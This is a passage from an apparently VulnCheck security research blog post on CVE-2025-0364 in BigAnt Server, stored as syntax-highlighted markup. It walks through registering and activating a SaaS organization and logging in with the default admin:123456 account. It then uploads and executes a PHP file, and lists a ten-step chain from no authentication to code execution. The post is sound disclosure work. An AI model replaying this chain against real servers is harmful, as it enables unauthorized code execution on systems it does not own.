\u002F\u002F更新状态\n",[1373,51368,51369,51371,51373,51375,51377,51379,51381,51383,51385,51387],{"class":1375,"line":7722},[1373,51370,7362],{"class":1383},[1373,51372,9156],{"class":4640},[1373,51374,7035],{"class":1383},[1373,51376,1388],{"class":1387},[1373,51378,47849],{"class":1391},[1373,51380,1388],{"class":1387},[1373,51382,15050],{"class":1383},[1373,51384,8575],{"class":1397},[1373,51386,5468],{"class":5467},[1373,51388,47289],{"class":1383},[1373,51390,51391,51393,51395,51397,51399,51401,51403,51405,51407,51409,51411],{"class":1375,"line":9903},[1373,51392,7362],{"class":1383},[1373,51394,9156],{"class":4640},[1373,51396,7035],{"class":1383},[1373,51398,1388],{"class":1387},[1373,51400,47076],{"class":1391},[1373,51402,1388],{"class":1387},[1373,51404,15050],{"class":1383},[1373,51406,8575],{"class":1397},[1373,51408,4656],{"class":1383},[1373,51410,50432],{"class":4640},[1373,51412,4912],{"class":1383},[1373,51414,51415,51417,51419,51421,51423,51426],{"class":1375,"line":9908},[1373,51416,4695],{"class":4636},[1373,51418,4641],{"class":1383},[1373,51420,16090],{"class":1397},[1373,51422,4656],{"class":1383},[1373,51424,51425],{"class":4640},"installDate",[1373,51427,47430],{"class":1383},[1373,51429,51430,51432,51434,51436,51438,51440,51442,51444,51446,51449,51451,51453,51455,51457,51459,51461,51464],{"class":1375,"line":9913},[1373,51431,4727],{"class":1383},[1373,51433,9156],{"class":4640},[1373,51435,7035],{"class":1383},[1373,51437,1388],{"class":1387},[1373,51439,51091],{"class":1391},[1373,51441,1388],{"class":1387},[1373,51443,15050],{"class":1383},[1373,51445,8575],{"class":1397},[1373,51447,51448],{"class":47982}," \\",[1373,51450,47986],{"class":9383},[1373,51452,47989],{"class":47982},[1373,51454,47992],{"class":9383},[1373,51456,47989],{"class":47982},[1373,51458,47997],{"class":9165},[1373,51460,48000],{"class":1397},[1373,51462,51463],{"class":7297},"getTryCode",[1373,51465,15603],{"class":1383},[1373,51467,51468,51470,51472,51474,51476,51479,51481,51483,51485,51487,51489,51491,51493,51495,51497,51499,51502,51504,51506],{"class":1375,"line":9932},[1373,51469,4727],{"class":1383},[1373,51471,9156],{"class":4640},[1373,51473,7035],{"class":1383},[1373,51475,1388],{"class":1387},[1373,51477,51478],{"class":1391},"auth_numbers",[1373,51480,1388],{"class":1387},[1373,51482,15050],{"class":1383},[1373,51484,8575],{"class":1397},[1373,51486,51448],{"class":47982},[1373,51488,47986],{"class":9383},[1373,51490,47989],{"class":47982},[1373,51492,47992],{"class":9383},[1373,51494,47989],{"class":47982},[1373,51496,47997],{"class":9165},[1373,51498,48000],{"class":1397},[1373,51500,51501],{"class":7297},"encrypt",[1373,51503,1384],{"class":1383},[1373,51505,48192],{"class":5467},[1373,51507,4680],{"class":1383},[1373,51509,51510,51512,51514,51516,51518,51521,51523,51525,51527,51529,51531,51533,51535,51537,51539,51541,51543,51545,51548,51550,51553,51555,51557,51560,51562,51564,51566,51568,51570,51573,51575],{"class":1375,"line":9937},[1373,51511,4727],{"class":1383},[1373,51513,9156],{"class":4640},[1373,51515,7035],{"class":1383},[1373,51517,1388],{"class":1387},[1373,51519,51520],{"class":1391},"auth_expiredate",[1373,51522,1388],{"class":1387},[1373,51524,15050],{"class":1383},[1373,51526,8575],{"class":1397},[1373,51528,51448],{"class":47982},[1373,51530,47986],{"class":9383},[1373,51532,47989],{"class":47982},[1373,51534,47992],{"class":9383},[1373,51536,47989],{"class":47982},[1373,51538,47997],{"class":9165},[1373,51540,48000],{"class":1397},[1373,51542,51501],{"class":7297},[1373,51544,1384],{"class":1383},[1373,51546,51547],{"class":1379},"strtotime",[1373,51549,1384],{"class":1383},[1373,51551,51552],{"class":1379},"date",[1373,51554,1384],{"class":1383},[1373,51556,1388],{"class":1387},[1373,51558,51559],{"class":1391},"Y-m-d H:i:s",[1373,51561,1388],{"class":1387},[1373,51563,5437],{"class":1383},[1373,51565,51547],{"class":1379},[1373,51567,1384],{"class":1383},[1373,51569,1388],{"class":1387},[1373,51571,51572],{"class":1391},"+15 day",[1373,51574,1388],{"class":1387},[1373,51576,51577],{"class":1383},"))));\n",[1373,51579,51580],{"class":1375,"line":9957},[1373,51581,4795],{"class":1383},[1373,51583,51584,51586,51588,51591,51593,51595],{"class":1375,"line":9962},[1373,51585,50072],{"class":34505},[1373,51587,4667],{"class":1397},[1373,51589,51590],{"class":7297},"save",[1373,51592,34467],{"class":1383},[1373,51594,9156],{"class":4640},[1373,51596,4680],{"class":1383},[1373,51598,51599],{"class":1375,"line":15955},[1373,51600,47181],{"class":4640},[1373,51602,51603],{"class":1375,"line":16030},[1373,51604,51605],{"class":4630}," \u002F\u002F发送邮件通知\n",[1373,51607,51608,51610,51612,51614,51616,51619],{"class":1375,"line":16035},[1373,51609,4695],{"class":4636},[1373,51611,4641],{"class":1383},[1373,51613,34506],{"class":34505},[1373,51615,4667],{"class":1397},[1373,51617,51618],{"class":4640},"is_send_activation_email",[1373,51620,47430],{"class":1383},[1373,51622,51623,51625,51627,51630,51632,51634],{"class":1375,"line":16083},[1373,51624,47549],{"class":34505},[1373,51626,4667],{"class":1397},[1373,51628,51629],{"class":7297},"sendMailNotify",[1373,51631,34467],{"class":1383},[1373,51633,50517],{"class":4640},[1373,51635,4680],{"class":1383},[1373,51637,51638],{"class":1375,"line":16098},[1373,51639,4795],{"class":1383},[1373,51641,51642],{"class":1375,"line":16103},[1373,51643,47181],{"class":4640},[1373,51645,51646],{"class":1375,"line":16147},[1373,51647,47181],{"class":4640},[1373,51649,51650,51652,51654],{"class":1375,"line":16153},[1373,51651,7340],{"class":4636},[1373,51653,14986],{"class":7054},[1373,51655,47289],{"class":1383},[1373,51657,51658],{"class":1375,"line":16164},[1373,51659,47181],{"class":4640},[1373,51661,51662],{"class":1375,"line":16170},[1373,51663,1855],{"class":1383},[18,51665,51666],{},"This successfully activates the SaaS organization and sets up the organization with the data we initially registered with. Time to test the activation of our initial organization:",[1354,51668,51670],{"className":8228,"code":51669,"language":8230,"meta":219,"style":219},"POST \u002Findex.php\u002FHome\u002FSaas\u002Freg_activation HTTP\u002F1.1\nHost: 10.0.0.104:8000\nContent-Length: 44\nContent-Type: application\u002Fx-www-form-urlencoded\nUser-Agent: Mozilla\u002F5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\u002F537.36 (KHTML, like Gecko) Chrome\u002F129.0.6668.71 Safari\u002F537.36\nCookie: PHPSESSID=5q37l00e0alpb5euu40403tj3e;\nConnection: keep-alive\n\nsaas_id=1438134D-4ECD-9FBC-CE77-8EF6C37F47DE\n",[886,51671,51672,51677,51681,51686,51691,51695,51700,51704,51708],{"__ignoreMap":219},[1373,51673,51674],{"class":1375,"line":1376},[1373,51675,51676],{"class":4640},"POST \u002Findex.php\u002FHome\u002FSaas\u002Freg_activation HTTP\u002F1.1\n",[1373,51678,51679],{"class":1375,"line":220},[1373,51680,50316],{"class":4640},[1373,51682,51683],{"class":1375,"line":1266},[1373,51684,51685],{"class":4640},"Content-Length: 44\n",[1373,51687,51688],{"class":1375,"line":1852},[1373,51689,51690],{"class":4640},"Content-Type: application\u002Fx-www-form-urlencoded\n",[1373,51692,51693],{"class":1375,"line":4692},[1373,51694,50331],{"class":4640},[1373,51696,51697],{"class":1375,"line":4724},[1373,51698,51699],{"class":4640},"Cookie: PHPSESSID=5q37l00e0alpb5euu40403tj3e;\n",[1373,51701,51702],{"class":1375,"line":4756},[1373,51703,50346],{"class":4640},[1373,51705,51706],{"class":1375,"line":4768},[1373,51707,6520],{"emptyLinePlaceholder":237},[1373,51709,51710],{"class":1375,"line":4792},[1373,51711,51712],{"class":4640},"saas_id=1438134D-4ECD-9FBC-CE77-8EF6C37F47DE\n",[18,51714,51715],{},"The server then responds with a \"Activate successfully\" and a little smiley face:",[1354,51717,51719],{"className":8228,"code":51718,"language":8230,"meta":219,"style":219},"HTTP\u002F1.1 200 OK\nDate: Thu, 09 Jan 2025 19:52:29 GMT\nServer: Apache\u002F2.4.46 (Win32) OpenSSL\u002F1.1.1g PHP\u002F7.4.14\nX-Powered-By: ThinkPHP\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\nCache-Control: private\nPragma: no-cache\nContent-Length: 1655\nKeep-Alive: timeout=5, max=100\nConnection: Keep-Alive\nContent-Type: text\u002Fhtml; charset=utf-8\n\n\u003C!DOCTYPE html PUBLIC \"-\u002F\u002FW3C\u002F\u002FDTD XHTML 1.0 Transitional\u002F\u002FEN\" \"http:\u002F\u002Fwww.w3.org\u002FTR\u002Fxhtml1\u002FDTD\u002Fxhtml1-transitional.dtd\">\n\u003Chtml xmlns=\"http:\u002F\u002Fwww.w3.org\u002F1999\u002Fxhtml\">\n\u003Chead>\n\u003Cmeta http-equiv=\"Content-Type\" content=\"text\u002Fhtml; charset=utf-8\" \u002F>\n\u003Ctitle>跳转提示\u003C\u002Ftitle>\n\u003Cstyle type=\"text\u002Fcss\">\n*{ padding: 0; margin: 0; }\nbody{ background: #fff; font-family: '微软雅黑'; color: #333; font-size: 16px; }\n.system-message{ padding: 24px 48px; }\n.system-message h1{ font-size: 100px; font-weight: normal; line-height: 120px; margin-bottom: 12px; }\n.system-message .jump{ padding-top: 10px}\n.system-message .jump a{ color: #333;}\n.system-message .success,.system-message .error{ line-height: 1.8em; font-size: 36px }\n.system-message .detail{ font-size: 12px; line-height: 20px; margin-top: 12px; display:none}\n\u003C\u002Fstyle>\n\u003Cmeta name=\"__hash__\" content=\"5cdc38b49dc8bdbfced7bbdaaa44f6c0_5351a56337376881b051417c1a46545c\" \u002F>\u003Cmeta name=\"__hash__\" content=\"5cdc38b49dc8bdbfced7bbdaaa44f6c0_5351a56337376881b051417c1a46545c\" \u002F>\u003C\u002Fhead>\n\u003Cbody>\n\u003Cdiv class=\"system-message\">\n\u003Ch1>:)\u003C\u002Fh1>\n\u003Cp class=\"success\">Activate successfully\u003C\u002Fp>\n\u003Cp class=\"detail\">\u003C\u002Fp>\n\u003Cp class=\"jump\">\n\n",[886,51720,51721,51726,51731,51736,51741,51746,51751,51756,51761,51766,51771,51776,51780,51799,51819,51827,51858,51876,51894,51922,51982,52010,52069,52093,52119,52163,52217,52225,52285,52293,52311,52328,52355,52377],{"__ignoreMap":219},[1373,51722,51723],{"class":1375,"line":1376},[1373,51724,51725],{"class":4640},"HTTP\u002F1.1 200 OK\n",[1373,51727,51728],{"class":1375,"line":220},[1373,51729,51730],{"class":4640},"Date: Thu, 09 Jan 2025 19:52:29 GMT\n",[1373,51732,51733],{"class":1375,"line":1266},[1373,51734,51735],{"class":4640},"Server: Apache\u002F2.4.46 (Win32) OpenSSL\u002F1.1.1g PHP\u002F7.4.14\n",[1373,51737,51738],{"class":1375,"line":1852},[1373,51739,51740],{"class":4640},"X-Powered-By: ThinkPHP\n",[1373,51742,51743],{"class":1375,"line":4692},[1373,51744,51745],{"class":4640},"Expires: Thu, 19 Nov 1981 08:52:00 GMT\n",[1373,51747,51748],{"class":1375,"line":4724},[1373,51749,51750],{"class":4640},"Cache-Control: private\n",[1373,51752,51753],{"class":1375,"line":4756},[1373,51754,51755],{"class":4640},"Pragma: no-cache\n",[1373,51757,51758],{"class":1375,"line":4768},[1373,51759,51760],{"class":4640},"Content-Length: 1655\n",[1373,51762,51763],{"class":1375,"line":4792},[1373,51764,51765],{"class":4640},"Keep-Alive: timeout=5, max=100\n",[1373,51767,51768],{"class":1375,"line":4798},[1373,51769,51770],{"class":4640},"Connection: Keep-Alive\n",[1373,51772,51773],{"class":1375,"line":4806},[1373,51774,51775],{"class":4640},"Content-Type: text\u002Fhtml; charset=utf-8\n",[1373,51777,51778],{"class":1375,"line":4817},[1373,51779,6520],{"emptyLinePlaceholder":237},[1373,51781,51782,51784,51786,51788,51791,51794,51797],{"class":1375,"line":4825},[1373,51783,6755],{"class":1383},[1373,51785,6758],{"class":6300},[1373,51787,6762],{"class":8252},[1373,51789,51790],{"class":8252}," PUBLIC",[1373,51792,51793],{"class":1391}," \"-\u002F\u002FW3C\u002F\u002FDTD XHTML 1.0 Transitional\u002F\u002FEN\"",[1373,51795,51796],{"class":1391}," \"http:\u002F\u002Fwww.w3.org\u002FTR\u002Fxhtml1\u002FDTD\u002Fxhtml1-transitional.dtd\"",[1373,51798,6765],{"class":1383},[1373,51800,51801,51803,51805,51808,51810,51812,51815,51817],{"class":1375,"line":4835},[1373,51802,11852],{"class":1383},[1373,51804,8230],{"class":6300},[1373,51806,51807],{"class":8252}," xmlns",[1373,51809,5417],{"class":1383},[1373,51811,183],{"class":1387},[1373,51813,51814],{"class":1391},"http:\u002F\u002Fwww.w3.org\u002F1999\u002Fxhtml",[1373,51816,183],{"class":1387},[1373,51818,6765],{"class":1383},[1373,51820,51821,51823,51825],{"class":1375,"line":4843},[1373,51822,11852],{"class":1383},[1373,51824,48974],{"class":6300},[1373,51826,6765],{"class":1383},[1373,51828,51829,51831,51833,51836,51838,51840,51842,51844,51847,51849,51851,51854,51856],{"class":1375,"line":4849},[1373,51830,11852],{"class":1383},[1373,51832,48983],{"class":6300},[1373,51834,51835],{"class":8252}," http-equiv",[1373,51837,5417],{"class":1383},[1373,51839,183],{"class":1387},[1373,51841,6391],{"class":1391},[1373,51843,183],{"class":1387},[1373,51845,51846],{"class":8252}," content",[1373,51848,5417],{"class":1383},[1373,51850,183],{"class":1387},[1373,51852,51853],{"class":1391},"text\u002Fhtml; charset=utf-8",[1373,51855,183],{"class":1387},[1373,51857,46508],{"class":1383},[1373,51859,51860,51862,51865,51867,51870,51872,51874],{"class":1375,"line":4877},[1373,51861,11852],{"class":1383},[1373,51863,51864],{"class":6300},"title",[1373,51866,5384],{"class":1383},[1373,51868,51869],{"class":4640},"跳转提示",[1373,51871,46627],{"class":1383},[1373,51873,51864],{"class":6300},[1373,51875,6765],{"class":1383},[1373,51877,51878,51880,51882,51884,51886,51888,51890,51892],{"class":1375,"line":4915},[1373,51879,11852],{"class":1383},[1373,51881,2901],{"class":6300},[1373,51883,8253],{"class":8252},[1373,51885,5417],{"class":1383},[1373,51887,183],{"class":1387},[1373,51889,49066],{"class":1391},[1373,51891,183],{"class":1387},[1373,51893,6765],{"class":1383},[1373,51895,51896,51899,51901,51905,51907,51909,51911,51914,51916,51918,51920],{"class":1375,"line":4931},[1373,51897,35613],{"class":51898},"sn17v",[1373,51900,9149],{"class":1383},[1373,51902,51904],{"class":51903},"sfFRu"," padding",[1373,51906,4606],{"class":1383},[1373,51908,5557],{"class":5467},[1373,51910,39663],{"class":1383},[1373,51912,51913],{"class":51903}," margin",[1373,51915,4606],{"class":1383},[1373,51917,5557],{"class":5467},[1373,51919,39663],{"class":1383},[1373,51921,35334],{"class":1383},[1373,51923,51924,51926,51928,51931,51933,51936,51939,51941,51944,51946,51948,51951,51953,51955,51958,51960,51962,51965,51967,51970,51972,51975,51978,51980],{"class":1375,"line":4947},[1373,51925,20718],{"class":51898},[1373,51927,9149],{"class":1383},[1373,51929,51930],{"class":51903}," background",[1373,51932,4606],{"class":1383},[1373,51934,51935],{"class":7054}," #",[1373,51937,51938],{"class":2326},"fff",[1373,51940,39663],{"class":1383},[1373,51942,51943],{"class":51903}," font-family",[1373,51945,4606],{"class":1383},[1373,51947,4713],{"class":1387},[1373,51949,51950],{"class":1391},"微软雅黑",[1373,51952,1388],{"class":1387},[1373,51954,39663],{"class":1383},[1373,51956,51957],{"class":51903}," color",[1373,51959,4606],{"class":1383},[1373,51961,51935],{"class":7054},[1373,51963,51964],{"class":2326},"333",[1373,51966,39663],{"class":1383},[1373,51968,51969],{"class":51903}," font-size",[1373,51971,4606],{"class":1383},[1373,51973,51974],{"class":5467}," 16",[1373,51976,51977],{"class":5387},"px",[1373,51979,39663],{"class":1383},[1373,51981,35334],{"class":1383},[1373,51983,51984,51987,51990,51992,51994,51996,51999,52001,52004,52006,52008],{"class":1375,"line":4952},[1373,51985,59],{"class":51986},"sRsjY",[1373,51988,51989],{"class":2206},"system-message",[1373,51991,9149],{"class":1383},[1373,51993,51904],{"class":51903},[1373,51995,4606],{"class":1383},[1373,51997,51998],{"class":5467}," 24",[1373,52000,51977],{"class":5387},[1373,52002,52003],{"class":5467}," 48",[1373,52005,51977],{"class":5387},[1373,52007,39663],{"class":1383},[1373,52009,35334],{"class":1383},[1373,52011,52012,52014,52016,52019,52021,52023,52025,52028,52030,52032,52035,52037,52041,52043,52046,52048,52051,52053,52055,52058,52060,52063,52065,52067],{"class":1375,"line":6776},[1373,52013,59],{"class":51986},[1373,52015,51989],{"class":2206},[1373,52017,52018],{"class":51898}," h1",[1373,52020,9149],{"class":1383},[1373,52022,51969],{"class":51903},[1373,52024,4606],{"class":1383},[1373,52026,52027],{"class":5467}," 100",[1373,52029,51977],{"class":5387},[1373,52031,39663],{"class":1383},[1373,52033,52034],{"class":51903}," font-weight",[1373,52036,4606],{"class":1383},[1373,52038,52040],{"class":52039},"s9BUQ"," normal",[1373,52042,39663],{"class":1383},[1373,52044,52045],{"class":51903}," line-height",[1373,52047,4606],{"class":1383},[1373,52049,52050],{"class":5467}," 120",[1373,52052,51977],{"class":5387},[1373,52054,39663],{"class":1383},[1373,52056,52057],{"class":51903}," margin-bottom",[1373,52059,4606],{"class":1383},[1373,52061,52062],{"class":5467}," 12",[1373,52064,51977],{"class":5387},[1373,52066,39663],{"class":1383},[1373,52068,35334],{"class":1383},[1373,52070,52071,52073,52075,52077,52080,52082,52085,52087,52089,52091],{"class":1375,"line":6781},[1373,52072,59],{"class":51986},[1373,52074,51989],{"class":2206},[1373,52076,1398],{"class":51986},[1373,52078,52079],{"class":2206},"jump",[1373,52081,9149],{"class":1383},[1373,52083,52084],{"class":51903}," padding-top",[1373,52086,4606],{"class":1383},[1373,52088,39673],{"class":5467},[1373,52090,51977],{"class":5387},[1373,52092,1855],{"class":1383},[1373,52094,52095,52097,52099,52101,52103,52106,52108,52110,52112,52114,52116],{"class":1375,"line":7524},[1373,52096,59],{"class":51986},[1373,52098,51989],{"class":2206},[1373,52100,1398],{"class":51986},[1373,52102,52079],{"class":2206},[1373,52104,52105],{"class":51898}," a",[1373,52107,9149],{"class":1383},[1373,52109,51957],{"class":51903},[1373,52111,4606],{"class":1383},[1373,52113,51935],{"class":7054},[1373,52115,51964],{"class":2326},[1373,52117,52118],{"class":1383},";}\n",[1373,52120,52121,52123,52125,52127,52129,52131,52133,52135,52137,52139,52141,52143,52145,52148,52150,52152,52154,52156,52159,52161],{"class":1375,"line":7530},[1373,52122,59],{"class":51986},[1373,52124,51989],{"class":2206},[1373,52126,1398],{"class":51986},[1373,52128,16142],{"class":2206},[1373,52130,5437],{"class":1383},[1373,52132,59],{"class":51986},[1373,52134,51989],{"class":2206},[1373,52136,1398],{"class":51986},[1373,52138,10265],{"class":2206},[1373,52140,9149],{"class":1383},[1373,52142,52045],{"class":51903},[1373,52144,4606],{"class":1383},[1373,52146,52147],{"class":5467}," 1.8",[1373,52149,1131],{"class":5387},[1373,52151,39663],{"class":1383},[1373,52153,51969],{"class":51903},[1373,52155,4606],{"class":1383},[1373,52157,52158],{"class":5467}," 36",[1373,52160,51977],{"class":5387},[1373,52162,35334],{"class":1383},[1373,52164,52165,52167,52169,52171,52174,52176,52178,52180,52182,52184,52186,52188,52190,52193,52195,52197,52200,52202,52204,52206,52208,52211,52213,52215],{"class":1375,"line":7546},[1373,52166,59],{"class":51986},[1373,52168,51989],{"class":2206},[1373,52170,1398],{"class":51986},[1373,52172,52173],{"class":2206},"detail",[1373,52175,9149],{"class":1383},[1373,52177,51969],{"class":51903},[1373,52179,4606],{"class":1383},[1373,52181,52062],{"class":5467},[1373,52183,51977],{"class":5387},[1373,52185,39663],{"class":1383},[1373,52187,52045],{"class":51903},[1373,52189,4606],{"class":1383},[1373,52191,52192],{"class":5467}," 20",[1373,52194,51977],{"class":5387},[1373,52196,39663],{"class":1383},[1373,52198,52199],{"class":51903}," margin-top",[1373,52201,4606],{"class":1383},[1373,52203,52062],{"class":5467},[1373,52205,51977],{"class":5387},[1373,52207,39663],{"class":1383},[1373,52209,52210],{"class":51903}," display",[1373,52212,4606],{"class":1383},[1373,52214,5079],{"class":52039},[1373,52216,1855],{"class":1383},[1373,52218,52219,52221,52223],{"class":1375,"line":7571},[1373,52220,46627],{"class":1383},[1373,52222,2901],{"class":6300},[1373,52224,6765],{"class":1383},[1373,52226,52227,52229,52231,52233,52235,52237,52240,52242,52244,52246,52248,52251,52253,52256,52258,52260,52262,52264,52266,52268,52270,52272,52274,52276,52278,52281,52283],{"class":1375,"line":7598},[1373,52228,11852],{"class":1383},[1373,52230,48983],{"class":6300},[1373,52232,46496],{"class":8252},[1373,52234,5417],{"class":1383},[1373,52236,183],{"class":1387},[1373,52238,52239],{"class":1391},"__hash__",[1373,52241,183],{"class":1387},[1373,52243,51846],{"class":8252},[1373,52245,5417],{"class":1383},[1373,52247,183],{"class":1387},[1373,52249,52250],{"class":1391},"5cdc38b49dc8bdbfced7bbdaaa44f6c0_5351a56337376881b051417c1a46545c",[1373,52252,183],{"class":1387},[1373,52254,52255],{"class":1383}," \u002F>\u003C",[1373,52257,48983],{"class":6300},[1373,52259,46496],{"class":8252},[1373,52261,5417],{"class":1383},[1373,52263,183],{"class":1387},[1373,52265,52239],{"class":1391},[1373,52267,183],{"class":1387},[1373,52269,51846],{"class":8252},[1373,52271,5417],{"class":1383},[1373,52273,183],{"class":1387},[1373,52275,52250],{"class":1391},[1373,52277,183],{"class":1387},[1373,52279,52280],{"class":1383}," \u002F>\u003C\u002F",[1373,52282,48974],{"class":6300},[1373,52284,6765],{"class":1383},[1373,52286,52287,52289,52291],{"class":1375,"line":7615},[1373,52288,11852],{"class":1383},[1373,52290,20718],{"class":6300},[1373,52292,6765],{"class":1383},[1373,52294,52295,52297,52299,52301,52303,52305,52307,52309],{"class":1375,"line":7635},[1373,52296,11852],{"class":1383},[1373,52298,46588],{"class":6300},[1373,52300,27205],{"class":8252},[1373,52302,5417],{"class":1383},[1373,52304,183],{"class":1387},[1373,52306,51989],{"class":1391},[1373,52308,183],{"class":1387},[1373,52310,6765],{"class":1383},[1373,52312,52313,52315,52317,52319,52322,52324,52326],{"class":1375,"line":7640},[1373,52314,11852],{"class":1383},[1373,52316,1920],{"class":6300},[1373,52318,5384],{"class":1383},[1373,52320,52321],{"class":4640},":)",[1373,52323,46627],{"class":1383},[1373,52325,1920],{"class":6300},[1373,52327,6765],{"class":1383},[1373,52329,52330,52332,52334,52336,52338,52340,52342,52344,52346,52349,52351,52353],{"class":1375,"line":7648},[1373,52331,11852],{"class":1383},[1373,52333,18],{"class":6300},[1373,52335,27205],{"class":8252},[1373,52337,5417],{"class":1383},[1373,52339,183],{"class":1387},[1373,52341,16142],{"class":1391},[1373,52343,183],{"class":1387},[1373,52345,5384],{"class":1383},[1373,52347,52348],{"class":4640},"Activate successfully",[1373,52350,46627],{"class":1383},[1373,52352,18],{"class":6300},[1373,52354,6765],{"class":1383},[1373,52356,52357,52359,52361,52363,52365,52367,52369,52371,52373,52375],{"class":1375,"line":7672},[1373,52358,11852],{"class":1383},[1373,52360,18],{"class":6300},[1373,52362,27205],{"class":8252},[1373,52364,5417],{"class":1383},[1373,52366,183],{"class":1387},[1373,52368,52173],{"class":1391},[1373,52370,183],{"class":1387},[1373,52372,49120],{"class":1383},[1373,52374,18],{"class":6300},[1373,52376,6765],{"class":1383},[1373,52378,52379,52381,52383,52385,52387,52389,52391,52393],{"class":1375,"line":7688},[1373,52380,11852],{"class":1383},[1373,52382,18],{"class":6300},[1373,52384,27205],{"class":8252},[1373,52386,5417],{"class":1383},[1373,52388,183],{"class":1387},[1373,52390,52079],{"class":1391},[1373,52392,183],{"class":1387},[1373,52394,6765],{"class":1383},[18,52396,52397],{},"We now have an activated SaaS org and the information on how to authenticate to the system. In order to actually do this and to see what we can do post-authentication, we need to first find where to use these credentials.",[61,52399,52401],{"id":52400},"cloud-drive-authentication-just-upload-php-i-guess","\"Cloud Drive\" Authentication & Just Upload PHP I Guess",[18,52403,52404,52405,52408],{},"Using the data from the first initial crawl for unauthenticated pages we quickly identified that ",[886,52406,52407],{},"\u002Findex.php\u002FAddin\u002Flogin\u002Findex.html"," would provide an authentication page requesting the company code, username, and password:",[18,52410,52411],{},[68,52412],{"alt":52413,"src":52414,":width":10862},"BigAnt Addin login page with data that was utilized to register the SaaS organization","\u002Fblog\u002Fbigant-cve-2025-0364\u002Fbigant-6-saas-login.png",[18,52416,52417,52418,52421,52422,52424,52425,52428,52429,52432,52433,52436],{},"The only information that we didn't submit in the initial registration was the username. A quick cross-reference in the database with the newly created SaaS organization in ",[886,52419,52420],{},"antdbms_aaa"," shows that the username that gets created with ",[886,52423,5800],{}," (shocking). A quick submission with ",[886,52426,52427],{},"aaa"," as the company code and ",[886,52430,52431],{},"admin:123456"," and we land on ",[886,52434,52435],{},"\u002Findex.php\u002Faddin\u002Fpublic\u002Fload\u002Fclientid\u002F1.html",", which provides the following page:",[18,52438,52439],{},[68,52440],{"alt":52441,"src":52442,":width":10862},"BigAnt post-authentication landing page for the add-in section. A Cloud Disk button and Bulletin button is visible","\u002Fblog\u002Fbigant-cve-2025-0364\u002Fbigant-8-saas-login-landing.png",[18,52444,52445],{},"We have officially confirmed and validated authentication. Instead of going straight for the SQL injection in the original CVE, Plus, the \"Cloud Disk\" is intriguing and didn't match much of the code I'd seen used in the rest of the application. Let's see what happens when we go to the Cloud Disk:",[18,52447,52448],{},[68,52449],{"alt":52450,"src":52451,":width":10862},"BigAnt Cloud Disk page displaying cloud disk filesystem icons","\u002Fblog\u002Fbigant-cve-2025-0364\u002Fbigant-9-saas-login-cloud-drive.png",[18,52453,52454],{},"Clicking on the Personal Cloud Disk link in the Drive page immediately leads us to the following page:",[18,52456,52457],{},[68,52458],{"alt":52459,"src":52460,":width":10862},"BigAnt Cloud Disk file upload page","\u002Fblog\u002Fbigant-cve-2025-0364\u002Fbigant-10-saas-cloud-drive-upload-page.png",[18,52462,52463],{},"Oh goodie a upload page. We are building a tower, but entirely made out of red flags.",[18,52465,52466],{},"If you immediately started thinking of MIME type sniffing bypasses or extension tricks on Windows related to recent disclosures, I applaud you but you might be overthinking. Let's just try and upload some PHP:",[1354,52468,52470],{"className":1367,"code":52469,"language":1369,"meta":219,"style":219},"\u003C?php echo \"oh no...\"; ?>\n",[886,52471,52472],{"__ignoreMap":219},[1373,52473,52474,52476,52478,52480,52482,52485,52487,52489],{"class":1375,"line":1376},[1373,52475,2323],{"class":1397},[1373,52477,1369],{"class":2326},[1373,52479,2329],{"class":1379},[1373,52481,4883],{"class":1387},[1373,52483,52484],{"class":1391},"oh no...",[1373,52486,183],{"class":1387},[1373,52488,39663],{"class":1383},[1373,52490,2347],{"class":1397},[18,52492,52493],{},"The application happily accepts our very hard fought PHP file and happily presents the uploaded PHP file:",[18,52495,52496],{},[68,52497],{"alt":52498,"src":52499,":width":10862},"BigAnt Cloud Disk successfully uploading PHP file","\u002Fblog\u002Fbigant-cve-2025-0364\u002Fbigant-12-saas-cloud-drive-upload-php.png",[18,52501,52502,52503,52506],{},"The preview options and other interaction pages will not work, but the HTML references the page just fine at ",[886,52504,52505],{},"\u002Fdata\u002FCB1E3E2E-58C5-0CB6-BD29-397DF76AB254\u002Fpan\u002FC65DC0F8-E4E8-8FB2-E345-6C53ABCE8D03\u002F2025-02-21\u002Fpwn.php"," so we open up the file and reach the finishing line:",[18,52508,52509],{},[68,52510],{"alt":52511,"src":52512},"BigAnt PHP file execution","\u002Fblog\u002Fbigant-cve-2025-0364\u002Fbigant-13-saas-cloud-drive-php-exec.png",[18,52514,52515],{},"Sometimes the silliest things work the best. We officially have a full exploit chain to go from no authentication to arbitrary PHP execution. Let's automate and mature it into an exploit.",[61,52517,52519],{"id":52518},"automation-with-go-exploit","Automation with go-exploit",[18,52521,52522],{},"In summary, the vulnerability requires the following HTTP requests to achieve full code execution:",[1789,52524,52525,52528,52531,52534,52541,52544,52547,52553,52560,52563],{},[25,52526,52527],{},"Get the CAPTCHA and CSRF tokens.",[25,52529,52530],{},"Solve CAPTCHA manually.",[25,52532,52533],{},"Register a new SaaS organization with the CAPTCHA and CSRF tokens from steps 1 & 2 with registration settings.",[25,52535,52536,52537,52540],{},"In a new session, request the login page with a ",[886,52538,52539],{},"saas="," cookie set to the new organization in step 3, this causes the new session to be bound to the SaaS instance the attacker just registered.",[25,52542,52543],{},"Use the session cookie from step 4 to request the demo page that displays SaaS UUID, requiring the bound SaaS session or else the application will bind the session to the default SaaS organization which is not known to the attacker.",[25,52545,52546],{},"Activate the registered organization with the SaaS UUID acquired in step 5.",[25,52548,52549,52550,52552],{},"Authenticate to the \"Cloud Drive\" page with the ",[886,52551,5800],{}," account of the organization and the attacker controlled registration data.",[25,52554,52555,52556,52559],{},"Get the Cloud Drive root IDs, UUIDs, date in ",[886,52557,52558],{},"YYYY-MM-DD"," format, and path information in order to know where the file is accessible.",[25,52561,52562],{},"Upload a PHP payload, note the paths and upload dates.",[25,52564,52565],{},"Trigger the PHP shell with the paths without authentication.",[18,52567,52568,52569,52572,52573],{},"This is the perfect opportunity to use ",[47,52570,20558],{"href":14297,"rel":52571},[51]," to create a small self contained exploit. All said and done the exploit was only roughly ~350 lines of code. The framework is the exact same system that the VulnCheck Initial Access Intelligence team uses to quickly create self-contained and mature exploits, and we are giving out our copy of CVE-2025-0364 to show off how well it works for situations like this: ",[47,52574,45540],{"href":45540,"rel":52575},[51],[18,52577,52578],{},"For the moment of truth, retrieve the CAPTCHA and pre-conditions for the exploit:",[1354,52580,52582],{"className":2195,"code":52581,"language":2197,"meta":219,"style":219},"poptart@grimm:~\u002Fsrc\u002Finitial-access\u002Ffeed\u002Fcve-2025-0364 $ 